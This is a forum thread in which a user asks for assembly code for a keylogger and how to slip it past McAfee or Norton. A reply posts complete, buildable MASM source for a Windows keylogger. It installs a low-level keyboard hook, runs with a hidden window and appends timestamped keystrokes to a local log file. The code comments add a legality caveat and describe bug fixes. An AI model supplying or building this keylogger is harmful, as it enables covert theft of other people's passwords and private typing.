ASM keylogger

Khaosgott96
PostPosted: Tue Jan 02, 2007 6:18 pm    Post subject: ASM keylogger Reply with quote

anyone know of some basic ASM source that can capture keystrokes and log them to a ".TXT" file?

and does anyone know how mcafee/norton would respond to a home written proggie like that?

and if it is possible to write it in a way to bypass mcafee/norton.


any help would be greatly appreciated
jstorme
PostPosted: Wed Jan 03, 2007 11:23 am    Post subject: Reply with quote

Have a look at this toolkit
hxxp://www.wasm.ru/baixado.php?mode=tool&id=221

It has an example of a basic keyboard spy.
I don't know how it will react with an anti-virus though.
Good luck,
sharpe
PostPosted: Tue Jan 09, 2007 3:12 pm    Post subject: Keylogger code Reply with quote

Make a new WinASM project and copy this into the asm file. It should build without any problems. I can't remember where I originally found it.

This keylogger is crude in how it logs — it keeps a 32-byte buffer, writes only letters, digits, space, tab and enter as characters, and logs every other key as a bracketed key name — but it's perhaps a good place to start. It uses a WH_KEYBOARD_LL hook procedure to monitor the keyboard for events.

<asm>
.386
.model flat, stdcall
; Target: 32-bit Windows (Win32 PE), MASM/WinASM syntax, stdcall ABI for the
; Win32 API calls and for the callbacks (WndProc, hook procedure) the system
; invokes in this process.
; Reviewer caveat: capturing another user's keystrokes without authorisation is
; unlawful in most jurisdictions; keep this to machines you own or are explicitly
; permitted to test on.

include windows.inc
include kernel32.inc
include user32.inc
includelib user32.lib
includelib kernel32.lib

WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
ourLLKeybProc PROTO :DWORD,:DWORD,:DWORD   ; LowLevelKeyboardProc(nCode, wParam, lParam)

.data
hFile HANDLE 0            ; log file handle, opened in WinMain and used by every WriteFile below
bufferOffset DWORD 0      ; number of bytes pending in 'buffer'; the hook flushes once it reaches 16
bCapsLockOn BOOL 0        ; 1 while the Caps Lock key is held, so repeated WM_KEYDOWNs don't re-toggle bCaps
bShift BOOL 0             ; 1 while a Shift key is held
bCaps BOOL 0              ; Caps Lock toggle state as tracked by the hook (seeded from GetKeyState in WinMain)
szClassName db "kLogger",0
szLogFile db "key.log",0  ; relative path: resolved against the process's current directory.
                          ; NOTE(review): the log is plain text and is opened with FILE_SHARE_READ,
                          ; so anyone who can read that directory can read the captured input.
szLoggerStarted db "Logger started ",0      ; 15 bytes; that length is passed literally to WriteFile
szLoggerStopped db 13,10,"Logger stopped ",0 ; 17 bytes (CR LF + 15); likewise passed literally
szFormatTime db "%02d.%02d.%d %02d:%02d:%02d (UTC)",13,10,0 ; wsprintf format: day.month.year hour:min:sec
szError db "Invalid File name",0  ; shown by WinMain when CreateWindowEx fails; the text is misleading there

; Layout of the structure lParam points at when a WH_KEYBOARD_LL hook is called
; (the hook reads vkCode, scanCode and dwFlags; time/dwExtraInfo are unused here).
KBDLLHOOKSTRUCT STRUCT
vkCode DWORD ?       ; virtual-key code (VK_*)
scanCode DWORD ?     ; hardware scan code, shifted into bits 16.. of the GetKeyNameText lParam
dwFlags DWORD ?      ; shifted into bits 24.. of that lParam, so bit 0 lands on its extended-key bit
time DWORD ?
dwExtraInfo DWORD ?
KBDLLHOOKSTRUCT ENDS

.data?
buffer db 32 dup(?)       ; pending keystroke text; the literal 32 is repeated as a bound in ourLLKeybProc
hInstance HINSTANCE ?     ; module handle, set at 'start'
pszCommandLine LPSTR ?    ; raw command line, set at 'start' and passed to WinMain (otherwise unused)
nBytesWritten DWORD ?     ; scratch out-parameter for every WriteFile call; never checked
hwnd HWND ?               ; the hidden window; the hook posts WM_CLOSE to it on F12

.code
; PE entry point: collect the module handle and command line, hand them to
; WinMain, and exit the process with WinMain's return value.
start:
        ; hInstance = GetModuleHandle(NULL)
        invoke  GetModuleHandle, NULL
        mov     hInstance, eax
        ; pszCommandLine = GetCommandLine()
        invoke  GetCommandLine
        mov     pszCommandLine, eax
        ; ExitProcess(WinMain(hInstance, NULL, pszCommandLine, SW_HIDE))
        ; (stdcall: arguments pushed right-to-left)
        push    SW_HIDE
        push    pszCommandLine
        push    NULL
        push    hInstance
        call    WinMain
        push    eax
        call    ExitProcess

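WinMain proc hInst:HINSTANCE, hPrevInst:HINSTANCE, CmdLine:LPSTR, CmdShow:DWORD
;-----------------------------------------------------------------------
; WinMain(hInst, hPrevInst, CmdLine, CmdShow) -> exit code in eax
; Opens (or appends to) key.log, registers a window class and creates a
; window that is never shown, installs the WH_KEYBOARD_LL hook, runs the
; message pump until WM_QUIT, then unhooks, flushes the buffer, writes the
; "stopped" stamp and closes the log.
; hPrevInst, CmdLine and CmdShow are accepted for the conventional signature
; but are not read.
; Fixes vs. the original: cbWndExtra was set to WS_EX_CONTROLPARENT (a window
; style flag, not a byte count); GetKeyState's toggle bit is now tested instead
; of the whole return value; a failed SetWindowsHookEx no longer leaves the
; pump spinning with no way to exit; GetMessage's -1 error return now ends the loop.
;-----------------------------------------------------------------------
    LOCAL wc:WNDCLASSEX
    LOCAL theHook:HHOOK
    LOCAL msg:MSG

    ; Open the log. OPEN_ALWAYS creates the file if missing and reports
    ; ERROR_ALREADY_EXISTS through GetLastError if it was already there.
    invoke CreateFile, addr szLogFile, GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
    mov hFile, eax
    cmp eax, INVALID_HANDLE_VALUE
    jne filenameok
    invoke ExitProcess, 0
filenameok:
    invoke GetLastError
    cmp eax, ERROR_ALREADY_EXISTS
    jne writefile
    invoke SetFilePointer, hFile, 0, NULL, FILE_END   ; existing file: append rather than overwrite
writefile:
    invoke WriteFile, hFile, addr szLoggerStarted, 15, addr nBytesWritten, NULL
    call writeTimeToLog

    ; Window class for the (never shown) window that owns the message loop.
    mov wc.cbSize, sizeof WNDCLASSEX
    mov wc.style, CS_HREDRAW or CS_VREDRAW
    mov wc.lpfnWndProc, offset WndProc
    mov wc.cbClsExtra, NULL
    mov wc.cbWndExtra, 0          ; no extra per-window bytes are ever accessed in this file
    push hInst
    pop wc.hInstance
    mov wc.hbrBackground, COLOR_BTNFACE+1
    mov wc.lpszMenuName, NULL
    mov wc.lpszClassName, offset szClassName
    mov wc.hIcon, NULL
    mov wc.hIconSm, NULL
    mov wc.hCursor, NULL
    invoke RegisterClassEx, addr wc
    test eax, eax
    jnz createwindow
    invoke ExitProcess, 0
createwindow:
    ; Style 0 and no ShowWindow call: the window only exists to receive WM_CLOSE.
    invoke CreateWindowEx, NULL, addr szClassName, NULL, 0, 0, 0, 0, 0, NULL, NULL, hInst, NULL
    .IF (!eax)
        ; szError's text ("Invalid File name") is misleading on this path; kept for compatibility.
        invoke MessageBox, NULL, addr szError, addr szError, MB_OK
        ret
    .ENDIF
    mov hwnd, eax

    ; Seed the Caps Lock toggle state. GetKeyState returns a SHORT whose low bit
    ; is the toggle state; bit 15 means "currently pressed", so test only bit 0.
    invoke GetKeyState, VK_CAPITAL
    test ax, 1
    jz capsdone
    mov bCaps, 1
capsdone:

    ; Install the low-level keyboard hook (no DLL needed for WH_KEYBOARD_LL).
    invoke SetWindowsHookEx, WH_KEYBOARD_LL, addr ourLLKeybProc, hInst, NULL
    mov theHook, eax
    .IF (!eax)
        ; Without the hook nothing would ever post WM_CLOSE (the hook does that on
        ; F12), so request shutdown now instead of pumping messages forever.
        invoke PostMessage, hwnd, WM_CLOSE, NULL, NULL
    .ENDIF

    ; Message pump: GetMessage returns 0 on WM_QUIT and -1 on error; stop on both.
    .WHILE TRUE
        invoke GetMessage, addr msg, NULL, 0, 0
        .BREAK .IF (eax == 0 || eax == -1)
        invoke TranslateMessage, addr msg
        invoke DispatchMessage, addr msg
    .ENDW

    ; Clean up: unhook (only if the hook was installed), flush pending text,
    ; stamp the log and close it.
    .IF (theHook)
        invoke UnhookWindowsHookEx, theHook
    .ENDIF
    call flushBuffer
    invoke WriteFile, hFile, addr szLoggerStopped, 17, addr nBytesWritten, NULL
    call writeTimeToLog
    invoke CloseHandle, hFile

    mov eax, msg.wParam     ; WM_QUIT's wParam = the value given to PostQuitMessage
    ret
WinMain endp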

;-----------------------------------------------------------------------
; WndProc(hWnd, uMsg, wParam, lParam) -> LRESULT in eax
; Window procedure for the hidden window: WM_CLOSE posts WM_QUIT (which ends
; WinMain's pump) and returns 0; every other message goes to DefWindowProc.
;-----------------------------------------------------------------------
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
        cmp     uMsg, WM_CLOSE
        jne     @F
        invoke  PostQuitMessage, NULL
        xor     eax, eax                ; handled -> return 0
        ret
@@:
        invoke  DefWindowProc, hWnd, uMsg, wParam, lParam
        ret
WndProc endp

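;-----------------------------------------------------------------------
; ourLLKeybProc(nCode, wParam, lParam) -> LRESULT in eax
; LowLevelKeyboardProc for the WH_KEYBOARD_LL hook, called by the system on
; the thread that installed it (stdcall).
;   nCode  : HC_ACTION means wParam/lParam describe a key event
;   wParam : WM_KEYDOWN / WM_KEYUP / WM_SYSKEYDOWN / WM_SYSKEYUP
;   lParam : pointer to a KBDLLHOOKSTRUCT
; Returns whatever CallNextHookEx returns.
; Side effects: appends text to 'buffer'/'bufferOffset' (flushing via
; flushBuffer), updates bShift/bCaps/bCapsLockOn, posts WM_CLOSE to 'hwnd' on F12.
; Fixes vs. the original: 'uses ebx' saves/restores ebx, which stdcall callers
; expect preserved and which the body clobbers; F12 now falls through to
; CallNextHookEx instead of returning early with PostMessage's non-zero result
; (which, per the LowLevelKeyboardProc contract, drops the event); Shift/Caps
; releases are also tracked on WM_SYSKEYUP so bShift cannot stay stuck after
; Shift is released while Alt is held.
;-----------------------------------------------------------------------
ourLLKeybProc proc uses ebx, nCode:DWORD, wParam:WPARAM, lParam:LPARAM
    .IF (nCode == HC_ACTION)
        mov ebx, lParam
        assume ebx:ptr KBDLLHOOKSTRUCT
        mov edx, [ebx].vkCode           ; edx = virtual-key code for the rest of the body
        .IF (wParam == WM_KEYDOWN)
            .IF (edx == VK_F12)
                ; Kill switch: closing the hidden window ends WinMain's message pump.
                invoke PostMessage, hwnd, WM_CLOSE, NULL, NULL
            .ELSEIF (edx == VK_LSHIFT || edx == VK_RSHIFT)
                mov bShift, 1
            .ELSEIF (edx == VK_CAPITAL)
                ; Toggle once per physical press; further WM_KEYDOWNs while the key
                ; is held are ignored until a key-up clears bCapsLockOn.
                .IF (!bCapsLockOn)
                    xor bCaps, 1
                    mov bCapsLockOn, 1
                .ENDIF
            .ELSE
                ; Keep at least 16 of the 32 bytes free before appending; the
                ; bracketed-name path below sizes itself to the remaining room.
                .IF (bufferOffset >= 32-16)
                    call flushBuffer
                .ENDIF
                mov ecx, bufferOffset
                .IF (edx == VK_SPACE || edx == VK_RETURN || edx == VK_TAB)
                    ; Stores the VK code byte itself, relying on these VK values
                    ; matching the ASCII space/CR/TAB characters.
                    mov buffer[ecx], dl
                    inc ecx
                .ELSEIF (!bShift && (edx > 2Fh && edx < 3Ah))
                    ; Unshifted top-row digits: VK_0..VK_9 are the ASCII digits.
                    mov buffer[ecx], dl
                    inc ecx
                .ELSEIF (edx > 40h && edx < 5Bh)
                    ; VK_A..VK_Z are ASCII 'A'..'Z'; lower-case unless exactly one of
                    ; Shift / Caps Lock is active (XOR of the two flags).
                    mov eax, bShift
                    xor eax, bCaps
                    .IF (!eax)
                        or edx, 20h
                    .ENDIF
                    mov buffer[ecx], dl
                    inc ecx
                .ELSE
                    ; Everything else is logged by name in square brackets;
                    ; a leading '!' marks that Shift was held.
                    mov buffer[ecx], '['
                    inc ecx
                    .IF (bShift)
                        mov buffer[ecx], '!'
                        inc ecx
                    .ENDIF
                    push ecx                    ; ecx is caller-saved; keep the write offset
                    mov eax, 32-1               ; bytes left, reserving one for ']'
                    sub eax, ecx
                    push eax                    ; cchSize
                    lea eax, buffer[ecx]
                    push eax                    ; lpString
                    ; GetKeyNameText wants a WM_KEYDOWN-style lParam: scan code in
                    ; bits 16.., dwFlags shifted to bits 24.. (bit 0 -> extended-key bit).
                    mov edx, [ebx].scanCode
                    mov eax, [ebx].dwFlags
                    shl edx, 16
                    shl eax, 24
                    or edx, eax
                    push edx                    ; lParam
                    call GetKeyNameText         ; stdcall: callee pops the 3 args; eax = chars written
                    pop ecx
                    add ecx, eax
                    mov buffer[ecx], ']'
                    inc ecx
                .ENDIF
                mov bufferOffset, ecx
            .ENDIF
        .ELSEIF (wParam == WM_KEYUP || wParam == WM_SYSKEYUP)
            ; Release tracking: Shift up clears bShift; any other key up re-arms
            ; the Caps Lock toggle.
            .IF (edx == VK_LSHIFT || edx == VK_RSHIFT)
                mov bShift, 0
            .ELSE
                mov bCapsLockOn, 0
            .ENDIF
        .ENDIF
        assume ebx:nothing
    .ENDIF

    ; Always pass the event on and return the next hook's result.
    invoke CallNextHookEx, NULL, nCode, wParam, lParam
    ret
ourLLKeybProc endp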

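;-----------------------------------------------------------------------
; writeTimeToLog() -> eax = WriteFile result
; Formats the current UTC system time with szFormatTime into a stack buffer
; and appends it to the log via hFile.
; Clobbers: eax, ecx, edx. (ebx is no longer used; the original clobbered it
; without saving, which stdcall callers do not expect.)
; Fix vs. the original: wsprintf is cdecl, so the caller must pop its
; arguments. The original never did; it only survived because MASM's 'leave'
; epilogue reset esp from ebp.
;-----------------------------------------------------------------------
writeTimeToLog proc
    LOCAL SysTime:SYSTEMTIME
    LOCAL output[32]:BYTE          ; "dd.mm.yyyy hh:mm:ss (UTC)\r\n" is 27 chars + NUL
    invoke GetSystemTime, addr SysTime
    ; Push the six WORD fields zero-extended, right-to-left for the format
    ; "%02d.%02d.%d %02d:%02d:%02d": day, month, year, hour, minute, second.
    movzx eax, SysTime.wSecond
    push eax
    movzx eax, SysTime.wMinute
    push eax
    movzx eax, SysTime.wHour
    push eax
    movzx eax, SysTime.wYear
    push eax
    movzx eax, SysTime.wMonth
    push eax
    movzx eax, SysTime.wDay
    push eax
    push offset szFormatTime
    lea eax, output
    push eax
    call wsprintf                   ; eax = number of characters written
    add esp, 8*4                    ; cdecl: caller removes the 8 DWORD arguments
    invoke WriteFile, hFile, addr output, eax, addr nBytesWritten, NULL
    ret
writeTimeToLog endp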

;-----------------------------------------------------------------------
; flushBuffer()
; Writes the pending bytes of 'buffer' (bufferOffset of them) to hFile and
; resets bufferOffset to 0. No-op when nothing is pending. WriteFile's result
; is not checked (same as the original).
; Clobbers: eax, ecx, edx.
;-----------------------------------------------------------------------
flushBuffer proc
        cmp     bufferOffset, 0
        je      @F                      ; nothing buffered
        invoke  WriteFile, hFile, addr buffer, bufferOffset, addr nBytesWritten, NULL
        mov     bufferOffset, 0
@@:
        ret
flushBuffer endp

; Unreachable: nothing in this file jumps to 'exit' ('start' ends in
; ExitProcess and WinMain returns to it). Left in place as found.
exit:
invoke ExitProcess,0

; 'end start' marks 'start' as the PE entry point.
end start
</asm>